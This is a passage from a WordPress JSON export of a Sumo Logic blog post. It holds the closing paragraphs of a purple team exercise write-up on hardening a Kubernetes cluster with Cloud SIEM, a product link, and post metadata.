extremely pleased with the results of this purple team exercise.<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"536\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Amazon-Web-Services-environment.jpg\" alt=\"Amazon Web Services environment\" class=\"wp-image-4582\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-e072c80f1ee8aef31183613000c80c77\">The team was able to identify new telemetry sources, craft new searches and alerts and perhaps most importantly, collaborate across various functions to better understand use cases and workflows, which resulted in the hardening of their Kubernetes cluster.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-f68736ccde41a80852196c3778c7cd86\">The teams\u2019 Sumo Logic Cloud SIEM instance proved to be a critical resource for the duration of the exercise and could handle telemetry at scale from various sources.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-da93560796a87b5031b5ba264bec947f\">The team feels much more confident in their threat detection posture and is already looking to perform this same type of exercise on their Amazon Web Services environment!<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-ba02b912579274760af28f32cc59164c\">Learn more about how a <a href=\"https:\/\/www.sumologic.com\/solutions\/cloud-siem\/\" target=\"_blank\" rel=\"noopener\">Cloud SIEM solution<\/a> can help your organization level up security.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div><\/section>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":32,"featured_media":25768,"template":"","meta":{"_acf_changed":false,"show_custom_date":false,"custom_date":"","featured":false,"featured_image":0,"learn_more_label":"","image_alt_text":"","learn_more_type":"","show_popup":false,"learn_more_link_file":0,"event_date":false,"event_start_date":"","event_end_date":"","place_holder_image_url":"","post_reading_time":"16","notification_enabled":false,"notification_text":"","notification_logo":"","notification_expiration_time":0,"is_enable_transparent_header":false,"selected_taxonomy_terms":{"blog-category":[137,126,132,127],"blog-tag":[],"translation_priority":[]},"selected_primary_terms":[],"learn_more_link":[],"featured_page_list":[],"notification_enabled_post_list":[],"_gspb_post_css":"","_relevanssi_hide_post":"","_relevanssi_hide_content":"","_relevanssi_pin_for_all":"","_relevanssi_pin_keywords":"","_relevanssi_unpin_keywords":"","_relevanssi_related_keywords":"","_relevanssi_related_include_ids":"","_relevanssi_related_exclude_ids":"","_relevanssi_related_no_append":"","_relevanssi_related_not_related":"","_relevanssi_related_posts":"4668,71369,71176","_relevanssi_noindex_reason":"","inline_featured_image":false,"footnotes":""},"blog-category":[137,126,132,127],"blog-tag":[],"class_list":["post-4583","blog","type-blog","status-publish","has-post-thumbnail","hentry","blog-category-azure","blog-category-cloud-siem","blog-category-containers","blog-category-secops-security"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/blog\/4583","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/blog"}],"about":[{"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/types\/blog"}],"author":[{"embeddable":true,"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/users\/32"}],"version-history":[{"count":5,"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/blog\/4583\/revisions"}],"predecessor-version":[{"id":71111,"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/blog\/4583\/revisions\/71111"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/media\/25768"}],"wp:attachment":[{"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/media?parent=4583"}],"wp:term":[{"taxonomy":"blog-category","embeddable":true,"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/blog-category?post=4583"},{"taxonomy":"blog-tag","embeddable":true,"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/blog-tag?post=4583"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}